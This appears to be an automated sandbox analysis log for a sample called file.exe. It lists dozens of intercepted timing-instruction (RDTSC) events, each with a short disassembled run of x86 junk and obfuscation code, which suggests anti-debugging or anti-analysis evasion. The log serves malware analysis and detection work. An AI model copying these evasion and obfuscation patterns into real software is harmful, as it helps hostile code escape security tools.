Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13AC1BA second address: 13AC1BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13AC1BE second address: 13AC1C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13AC1C6 second address: 13AC204 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F0F04CBD316h 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007F0F04CBD31Ch 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F0F04CBD31Ch 0x0000001a jmp 00007F0F04CBD326h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13AC204 second address: 13AC215 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F0F0527E406h 0x00000009 jnc 00007F0F0527E406h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13AD7ED second address: 13AD7F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13AD7F3 second address: 13AD7F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13ADD4A second address: 13ADD4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13ADE1E second address: 13ADE24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13ADEE6 second address: 13ADEEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13ADEEE second address: 13ADF0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0F0527E406h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F0F0527E40Eh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13AE1A4 second address: 13AE1AE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13AE1AE second address: 13AE1B8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0F0527E40Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13AE1B8 second address: 13AE1C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jl 00007F0F04CBD316h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13AE1C8 second address: 13AE1CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13AE299 second address: 13AE29D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13AE371 second address: 13AE376 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13AE99C second address: 13AE9A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13AE9A0 second address: 13AE9B2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0F0527E406h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F0F0527E406h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13AE9B2 second address: 13AE9B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13AE9B6 second address: 13AEA21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F0F0527E408h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 00000018h 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov esi, dword ptr [ebp+122D37D4h] 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D2ABEh], edi 0x00000030 push 00000000h 0x00000032 push 00000000h 0x00000034 push ebx 0x00000035 call 00007F0F0527E408h 0x0000003a pop ebx 0x0000003b mov dword ptr [esp+04h], ebx 0x0000003f add dword ptr [esp+04h], 00000015h 0x00000047 inc ebx 0x00000048 push ebx 0x00000049 ret 0x0000004a pop ebx 0x0000004b ret 0x0000004c mov dword ptr [ebp+122D3394h], ecx 0x00000052 sub dword ptr [ebp+122D2AE5h], edx 0x00000058 xchg eax, ebx 0x00000059 push ecx 0x0000005a jo 00007F0F0527E40Ch 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13AEA21 second address: 13AEA2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B12BD second address: 13B1364 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0F0527E406h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jno 00007F0F0527E408h 0x00000010 popad 0x00000011 nop 0x00000012 adc edi, 4C01FE11h 0x00000018 push esi 0x00000019 mov edi, dword ptr [ebp+122D1F9Ah] 0x0000001f pop esi 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007F0F0527E408h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 0000001Bh 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c call 00007F0F0527E40Bh 0x00000041 pop edi 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push esi 0x00000047 call 00007F0F0527E408h 0x0000004c pop esi 0x0000004d mov dword ptr [esp+04h], esi 0x00000051 add dword ptr [esp+04h], 0000001Dh 0x00000059 inc esi 0x0000005a push esi 0x0000005b ret 0x0000005c pop esi 0x0000005d ret 0x0000005e mov edi, 77939EEFh 0x00000063 mov si, DEFDh 0x00000067 xchg eax, ebx 0x00000068 jmp 00007F0F0527E411h 0x0000006d push eax 0x0000006e push eax 0x0000006f push edx 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007F0F0527E40Dh 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B1364 second address: 13B136A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B2A2C second address: 13B2A3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E40Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B2A3D second address: 13B2A43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 136C405 second address: 136C419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F0F0527E40Bh 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 136C419 second address: 136C430 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD323h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 136C430 second address: 136C445 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0F0527E40Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 136C445 second address: 136C457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F0F04CBD316h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 136C457 second address: 136C4B1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0F0527E406h 0x00000008 jp 00007F0F0527E406h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebx 0x00000011 jmp 00007F0F0527E412h 0x00000016 jmp 00007F0F0527E413h 0x0000001b pop ebx 0x0000001c jmp 00007F0F0527E40Fh 0x00000021 pushad 0x00000022 jmp 00007F0F0527E40Fh 0x00000027 push ecx 0x00000028 pop ecx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B4BA4 second address: 13B4BA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B4BA8 second address: 13B4BAE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B70AF second address: 13B70C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0F04CBD31Dh 0x00000009 popad 0x0000000a push ebx 0x0000000b pushad 0x0000000c popad 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B70C5 second address: 13B70CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B70CB second address: 13B70D5 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0F04CBD316h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13BA9B3 second address: 13BA9C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F0F0527E406h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13BA9C5 second address: 13BA9C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13BAF34 second address: 13BAF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13BAF38 second address: 13BAF3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13BAF3C second address: 13BAF42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13BAF42 second address: 13BAFD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebp 0x0000000f call 00007F0F04CBD318h 0x00000014 pop ebp 0x00000015 mov dword ptr [esp+04h], ebp 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ebp 0x00000022 push ebp 0x00000023 ret 0x00000024 pop ebp 0x00000025 ret 0x00000026 jl 00007F0F04CBD31Ch 0x0000002c mov edi, dword ptr [ebp+122D39E0h] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007F0F04CBD318h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 00000019h 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e add bx, 372Fh 0x00000053 pushad 0x00000054 mov edi, dword ptr [ebp+122D2378h] 0x0000005a mov eax, dword ptr [ebp+122D57FBh] 0x00000060 popad 0x00000061 push 00000000h 0x00000063 push ecx 0x00000064 push esi 0x00000065 mov dword ptr [ebp+1248114Dh], esi 0x0000006b pop ebx 0x0000006c pop edi 0x0000006d push eax 0x0000006e je 00007F0F04CBD324h 0x00000074 pushad 0x00000075 push eax 0x00000076 push edx 0x00000077 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13BBF4A second address: 13BBF9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F0F0527E408h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 stc 0x00000026 push 00000000h 0x00000028 movzx ebx, dx 0x0000002b push 00000000h 0x0000002d mov dword ptr [ebp+122D2598h], ebx 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F0F0527E412h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F39E0 second address: 13F39E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F39E4 second address: 13F39FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F04CBD31Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F414D second address: 13F4158 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F42E4 second address: 13F42F5 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0F04CBD31Ch 0x00000008 jc 00007F0F04CBD316h 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F42F5 second address: 13F42FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F4452 second address: 13F445F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jne 00007F0F04CBD316h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F445F second address: 13F446E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F0F0527E406h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F446E second address: 13F4477 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F4477 second address: 13F447D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F447D second address: 13F448F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F0F04CBD318h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13F76FF second address: 13F7703 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FA220 second address: 13FA22D instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0F04CBD316h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FA22D second address: 13FA238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FA38D second address: 13FA392 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FA392 second address: 13FA398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FDD36 second address: 13FDD3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FDD3A second address: 13FDD4F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0F0527E40Fh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE2CC second address: 13FE2D4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE2D4 second address: 13FE2DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE2DA second address: 13FE2DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13FE2DE second address: 13FE30B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E410h 0x00000007 jmp 00007F0F0527E411h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1403D4A second address: 1403D54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1403D54 second address: 1403D72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0F0527E415h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14025C5 second address: 14025CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 14025CD second address: 14025D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1402A31 second address: 1402A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1402A37 second address: 1402A3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1402BC1 second address: 1402BF0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F0F04CBD321h 0x0000000d pop edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0F04CBD322h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1402BF0 second address: 1402BF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1402BF4 second address: 1402C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 js 00007F0F04CBD31Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B8A04 second address: 13B8A0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B8A0A second address: 13B8A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B8A0E second address: 13B8A80 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov ecx, dword ptr [ebp+122D38B0h] 0x0000000f mov ebx, dword ptr [ebp+1248DA6Eh] 0x00000015 push 00000000h 0x00000017 push edx 0x00000018 call 00007F0F0527E408h 0x0000001d pop edx 0x0000001e mov dword ptr [esp+04h], edx 0x00000022 add dword ptr [esp+04h], 00000015h 0x0000002a inc edx 0x0000002b push edx 0x0000002c ret 0x0000002d pop edx 0x0000002e ret 0x0000002f mov edx, dword ptr [ebp+122D37F8h] 0x00000035 add eax, ebx 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007F0F0527E408h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 0000001Ch 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 sub dword ptr [ebp+122D2AA3h], ecx 0x00000057 push eax 0x00000058 pushad 0x00000059 push eax 0x0000005a jno 00007F0F0527E406h 0x00000060 pop eax 0x00000061 push eax 0x00000062 push edx 0x00000063 push ebx 0x00000064 pop ebx 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 13B8A80 second address: 13B8AD9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F0F04CBD318h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 sub dword ptr [ebp+122D322Bh], ecx 0x0000002a push 00000004h 0x0000002c mov edi, dword ptr [ebp+122D3904h] 0x00000032 nop 0x00000033 jmp 00007F0F04CBD31Eh 0x00000038 push eax 0x00000039 push eax 0x0000003a push edx 0x0000003b push ecx 0x0000003c jmp 00007F0F04CBD31Ch 0x00000041 pop ecx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1403A4A second address: 1403A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1407A7E second address: 1407A82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1407116 second address: 1407127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F0F0527E406h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1407689 second address: 1407693 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0F04CBD316h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140DC3A second address: 140DC64 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0F0527E406h 0x00000008 jne 00007F0F0527E406h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F0F0527E418h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140DC64 second address: 140DC68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 140DC68 second address: 140DC75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pop edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
